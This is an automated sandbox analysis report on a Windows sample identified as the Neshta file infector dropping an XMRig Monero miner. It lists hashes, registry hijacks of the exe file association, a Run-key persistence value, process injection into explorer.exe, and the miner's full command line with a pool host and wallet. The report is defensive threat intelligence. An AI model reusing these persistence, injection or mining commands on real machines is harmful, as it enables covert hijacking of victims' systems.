Analysis
Max time kernel: 145s
Max time network: 163s
Platform: windows10-2004_x64
Resource: win10v2004-20220414-en
Submitted: 30-06-2022 23:38
Static task: static1
Behavioral task: behavioral1
Sample: 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Resource: win7-20220414-en

General
Target: 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Size: 4.6MB
MD5: e60c69bcff750e837526d0763d50344b
SHA1: 7d3a15333c75990ea48dc678c646a970d84c5fd0
SHA256: 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6
SHA512: a16edc17d8deb3fa0301d70875612282beb692054d69be3ad6cf7c3d6aa944f4eb471e76e12ca3de8e2b2d730c87600e40196585483f7b642283e77a27c90ae7

Malware Config

Signatures
Detect Neshta Payload (30 IoCs)
Modifies system executable filetype association (2 TTPs, 1 IoC)
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Neshta
Malware in the Neshta family is a file infector: it inserts itself into other executable files in order to spread and cause damage.
XMRig Miner Payload (4 IoCs)
  resource | yara_rule
  behavioral2/memory/3568-157-0x0000000140000000-0x0000000140747000-memory.dmp | xmrig
  behavioral2/memory/3568-146-0x0000000140740070-mapping.dmp | xmrig
  behavioral2/memory/3568-159-0x0000000140000000-0x0000000140747000-memory.dmp | xmrig
  behavioral2/memory/3568-173-0x0000000140000000-0x0000000140747000-memory.dmp | xmrig
Executes dropped EXE (3 IoCs)
  pid | process
  4232 | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
  4204 | svchost.com
  3696 | Services.exe
Processes:
  resource | yara_rule
  behavioral2/memory/3568-145-0x0000000140000000-0x0000000140747000-memory.dmp | upx
  behavioral2/memory/3568-156-0x0000000140000000-0x0000000140747000-memory.dmp | upx
  behavioral2/memory/3568-157-0x0000000140000000-0x0000000140747000-memory.dmp | upx
  behavioral2/memory/3568-159-0x0000000140000000-0x0000000140747000-memory.dmp | upx
  behavioral2/memory/3568-173-0x0000000140000000-0x0000000140747000-memory.dmp | upx
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials and similar secrets.
Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\Services.exe" | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Suspicious use of SetThreadContext (1 IoC)
  description | pid | process | target process
  PID 3696 set thread context of 3568 | 3696 | Services.exe | explorer.exe
Drops file in Program Files directory (64 IoCs)
Drops file in Windows directory (3 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\svchost.com | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
  File opened for modification | C:\Windows\directx.sys | svchost.com
  File opened for modification | C:\Windows\svchost.com | svchost.com
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (2 IoCs)
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
  Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Suspicious behavior: EnumeratesProcesses (23 IoCs)
  pid | process
  4232 | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe (the same entry is reported 23 times)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 4232 | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
  Token: SeDebugPrivilege | 3696 | Services.exe
  Token: SeLockMemoryPrivilege | 3568 | explorer.exe
  Token: SeLockMemoryPrivilege | 3568 | explorer.exe
Suspicious use of WriteProcessMemory (14 IoCs)
  description | pid | process | target process
  PID 768 wrote to memory of 4232 | 768 | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe (reported 2 times)
  PID 4232 wrote to memory of 4204 | 4232 | 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe | svchost.com (reported 3 times)
  PID 4204 wrote to memory of 3696 | 4204 | svchost.com | Services.exe (reported 2 times)
  PID 3696 wrote to memory of 3568 | 3696 | Services.exe | explorer.exe (reported 7 times)
Processes
(the bracketed number is the depth of the process in the process tree)

[1] C:\Users\Admin\AppData\Local\Temp\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe"
    - Modifies system executable filetype association
    - Checks computer location settings
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\3582-490\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\3582-490\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Adds Run key to start application
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\svchost.com
            Command line: "C:\Windows\svchost.com" "C:\Users\Admin\Services.exe"
            - Executes dropped EXE
            - Drops file in Program Files directory
            - Drops file in Windows directory
            - Suspicious use of WriteProcessMemory

[1] C:\Users\Admin\Services.exe
    Command line: C:\Users\Admin\Services.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\explorer.exe
        Command line: C:\Windows\explorer.exe --url=81.61.77.92:1111 -u 42LWroKkaot7k6VU59vZyz7kxmhQGgWJhfdrEhV5GBkQ1Q6DqNRmoDALTM4PoM5n2JcS4t4wYDXTfWR8oyM8XfQhQxXhvdU -p x --coin monero-t 1 --cpu-max-threads-hint=50 -B
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads